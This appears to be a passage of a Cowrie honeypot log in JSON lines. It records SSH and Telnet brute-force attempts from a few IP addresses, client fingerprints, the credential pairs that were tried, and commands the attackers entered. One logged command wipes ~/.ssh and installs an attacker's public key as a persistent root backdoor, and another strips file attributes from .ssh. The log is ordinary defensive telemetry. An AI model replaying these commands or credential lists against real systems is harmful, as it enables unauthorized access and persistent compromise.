{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:06:15.247213Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:15.248152Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42594,"dst_ip":"1.2.3.4","dst_port":22,"session":"73267c81d865","protocol":"ssh","message":"New connection: 212.227.235.229:42594 (1.2.3.4:22) [session: 73267c81d865]","sensor":"my-vps","timestamp":"2025-08-26T02:06:15.507752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:06:15.508527Z","src_ip":"212.227.235.229","session":"73267c81d865"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:06:15.769841Z","src_ip":"212.227.235.229","session":"73267c81d865"}
{"eventid":"cowrie.session.closed","duration":30.568013906478882,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:16.656710Z","src_ip":"36.227.194.152","session":"7e0b1afe725a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:06:16.848916Z","src_ip":"212.227.235.229","session":"73267c81d865"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:18.110024Z","src_ip":"212.227.235.229","session":"73267c81d865"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42610,"dst_ip":"1.2.3.4","dst_port":22,"session":"9402a925c597","protocol":"ssh","message":"New connection: 212.227.235.229:42610 (1.2.3.4:22) [session: 9402a925c597]","sensor":"my-vps","timestamp":"2025-08-26T02:06:18.369120Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:06:18.369922Z","src_ip":"212.227.235.229","session":"9402a925c597"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:06:18.630586Z","src_ip":"212.227.235.229","session":"9402a925c597"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:06:19.708968Z","src_ip":"212.227.235.229","session":"9402a925c597"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:19.972976Z","src_ip":"212.227.235.229","session":"a4823710c3f7"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:19.974210Z","src_ip":"212.227.235.229","session":"9402a925c597"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54686,"dst_ip":"1.2.3.4","dst_port":22,"session":"68ac09ab8ef9","protocol":"ssh","message":"New connection: 212.227.235.229:54686 (1.2.3.4:22) [session: 68ac09ab8ef9]","sensor":"my-vps","timestamp":"2025-08-26T02:06:28.850419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:06:29.575809Z","src_ip":"212.227.235.229","session":"68ac09ab8ef9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:06:29.576470Z","src_ip":"212.227.235.229","session":"68ac09ab8ef9"}
{"eventid":"cowrie.login.success","username":"root","password":"Jolon@123","message":"login attempt [root/Jolon@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:06:32.467531Z","src_ip":"212.227.235.229","session":"68ac09ab8ef9"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:06:33.029835Z","src_ip":"212.227.235.229","session":"68ac09ab8ef9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33348,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7eff9d56efc","protocol":"telnet","message":"New connection: 212.227.235.229:33348 (1.2.3.4:23) [session: f7eff9d56efc]","sensor":"my-vps","timestamp":"2025-08-26T02:07:09.116437Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46214,"dst_ip":"1.2.3.4","dst_port":22,"session":"f680c7b0860d","protocol":"ssh","message":"New connection: 212.227.235.229:46214 (1.2.3.4:22) [session: f680c7b0860d]","sensor":"my-vps","timestamp":"2025-08-26T02:07:32.102541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:07:32.103402Z","src_ip":"212.227.235.229","session":"f680c7b0860d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:07:32.384803Z","src_ip":"212.227.235.229","session":"f680c7b0860d"}
{"eventid":"cowrie.login.failed","username":"student1","password":"123456","message":"login attempt [student1/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T02:07:33.551076Z","src_ip":"212.227.235.229","session":"f680c7b0860d"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:07:34.834108Z","src_ip":"212.227.235.229","session":"f680c7b0860d"}
{"eventid":"cowrie.session.closed","duration":30.763227701187134,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:07:39.879593Z","src_ip":"212.227.235.229","session":"f7eff9d56efc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49156,"dst_ip":"1.2.3.4","dst_port":23,"session":"33dfa1ed6c1d","protocol":"telnet","message":"New connection: 212.227.235.229:49156 (1.2.3.4:23) [session: 33dfa1ed6c1d]","sensor":"my-vps","timestamp":"2025-08-26T02:08:19.461729Z"}
{"eventid":"cowrie.session.closed","duration":31.318992614746094,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:08:50.780651Z","src_ip":"212.227.235.229","session":"33dfa1ed6c1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49148,"dst_ip":"1.2.3.4","dst_port":22,"session":"951df144a535","protocol":"ssh","message":"New connection: 212.227.235.229:49148 (1.2.3.4:22) [session: 951df144a535]","sensor":"my-vps","timestamp":"2025-08-26T02:08:52.400887Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:08:52.401928Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:08:52.661152Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@321","message":"login attempt [root/Huawei@321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:08:53.736906Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:08:54.299504Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:08:54.300173Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T02:08:54.301001Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:08:54.561211Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:08:55.140360Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T02:08:55.141039Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T02:08:55.403478Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:08:55.404361Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43358,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d6ca38de9e7","protocol":"ssh","message":"New connection: 212.227.235.229:43358 (1.2.3.4:22) [session: 7d6ca38de9e7]","sensor":"my-vps","timestamp":"2025-08-26T02:08:55.661817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:08:55.662679Z","src_ip":"212.227.235.229","session":"7d6ca38de9e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:08:55.920917Z","src_ip":"212.227.235.229","session":"7d6ca38de9e7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T02:08:56.996453Z","src_ip":"212.227.235.229","session":"7d6ca38de9e7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:08:58.256734Z","src_ip":"212.227.235.229","session":"7d6ca38de9e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43366,"dst_ip":"1.2.3.4","dst_port":22,"session":"da59cfb071c7","protocol":"ssh","message":"New connection: 212.227.235.229:43366 (1.2.3.4:22) [session: da59cfb071c7]","sensor":"my-vps","timestamp":"2025-08-26T02:08:58.517824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:08:58.518691Z","src_ip":"212.227.235.229","session":"da59cfb071c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T02:08:58.778311Z","src_ip":"212.227.235.229","session":"da59cfb071c7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:08:59.857449Z","src_ip":"212.227.235.229","session":"da59cfb071c7"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:09:00.119993Z","src_ip":"212.227.235.229","session":"951df144a535"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:09:00.121022Z","src_ip":"212.227.235.229","session":"da59cfb071c7"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54810,"dst_ip":"1.2.3.4","dst_port":22,"session":"45b756116286","protocol":"ssh","message":"New connection: 217.72.205.35:54810 (1.2.3.4:22) [session: 45b756116286]","sensor":"my-vps","timestamp":"2025-08-26T02:10:06.973304Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:10:06.974394Z","src_ip":"217.72.205.35","session":"45b756116286"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35038,"dst_ip":"1.2.3.4","dst_port":22,"session":"e612ee4db97f","protocol":"ssh","message":"New connection: 212.227.235.229:35038 (1.2.3.4:22) [session: e612ee4db97f]","sensor":"my-vps","timestamp":"2025-08-26T02:10:14.002031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T02:10:14.002861Z","src_ip":"212.227.235.229","session":"e612ee4db97f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@o